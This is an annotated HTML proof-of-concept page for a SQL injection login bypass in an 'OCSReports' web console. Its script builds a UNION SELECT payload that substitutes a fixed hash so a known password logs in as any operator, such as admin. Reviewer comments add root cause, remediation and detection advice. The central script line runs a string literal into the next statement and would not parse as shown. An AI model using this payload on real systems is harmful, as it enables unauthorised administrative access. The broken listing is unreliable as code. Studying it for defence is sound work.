<!--
  Proof-of-concept page for a SQL injection in the login form of an
  "OCSReports" web console (the label is taken from the form below).

  What the page is written to do:
    * The visible fields take a console base URL and an operator id.
    * On submit, inject() rewrites the form target and fills the two hidden
      fields that are actually posted: "login" and "pass".
    * The value placed in "login" is a SQL fragment, not a user name.

  Defender notes (review):
    * Root cause, as far as this page shows: the server presumably places the
      "login" POST field inside a quoted SQL string without escaping or
      binding. Confirm against the server-side login code.
    * Remediation belongs on the server: bind "login" as a parameter of a
      prepared statement, and verify the password in application code against
      the stored, salted hash of the row that query returns.
    * Detection: a "login" POST field to index.php that contains a single
      quote or the words UNION SELECT is not a legitimate login. POST bodies
      are normally absent from access logs, so this needs WAF or
      application-level logging.
    * NOTE(review): the listing is reproduced token for token as captured;
      it has not been checked for validity or run.
-->
<script>
/*
 * inject(): bound to the submit button's onclick, so it runs before the
 * form is posted. It reads the two visible inputs and writes the form
 * action plus the hidden "login" and "pass" fields. Returns nothing.
 */
function inject() {
  // Target URL = value of the "ocsreports" field with 'index.php' appended.
  // No separator is added, so the field value has to end with a slash.
  document.getElementById('log').action = document.getElementById('ocsreports').value + 'index.php';
  // "sql" is assigned without a declaration, so it is an implicit global.
  // The literal closes a quoted value with 0', appends a UNION SELECT of
  // id, accesslvl and a fixed 32-hex-character constant from the operators
  // table, and reopens a quote for WHERE id=. The "user" field value is then
  // appended and the result stored in the hidden "login" field.
  // NOTE(review): the constant has the length of an MD5 digest; presumably it
  // stands in for the stored password hash that the server compares with the
  // posted "pass" value. Verify against the server code.
  sql = "0' UNION SELECT id, accesslvl, 'a181b4673216ad247a0f78066a9646e1' FROM operators WHERE id='" document.getElementById('login').value = sql + document.getElementById('user').value;
  // Fixed password value posted alongside the crafted "login" field.
  document.getElementById('pass').value = "inject";
}
</script>
<!--
  Only controls with a name attribute are submitted: "login", "pass" and
  "subLogin". The visible "ocsreports" and "user" inputs carry an id only and
  are read by inject(), not posted. The action attribute is empty until
  inject() sets it.
-->
<form name="log" id="log" action="" method="post">
  <table border="0" width="450px">
    <tr>
      <td><b>OCSReports :</b></td>
      <!-- Base URL of the console; the default is a placeholder host. -->
      <td><input type="text" id="ocsreports" size="40" value="http://www.example.com/ocsreports/" /></td>
    </tr>
    <tr>
      <td><b>Login :</b></td>
      <!-- Operator id that inject() appends after the SQL fragment. -->
      <td><input type="text" id="user" size="40" value="admin" /></td>
    </tr>
    <tr>
      <!-- Hidden fields filled by inject() and sent in the POST body. -->
      <td><input type="hidden" name="login" id="login" /> <input type="hidden" name="pass" id="pass" /></td>
      <td><input type="submit" name="subLogin" onclick="inject();"></td>
    </tr>
  </table>
</form>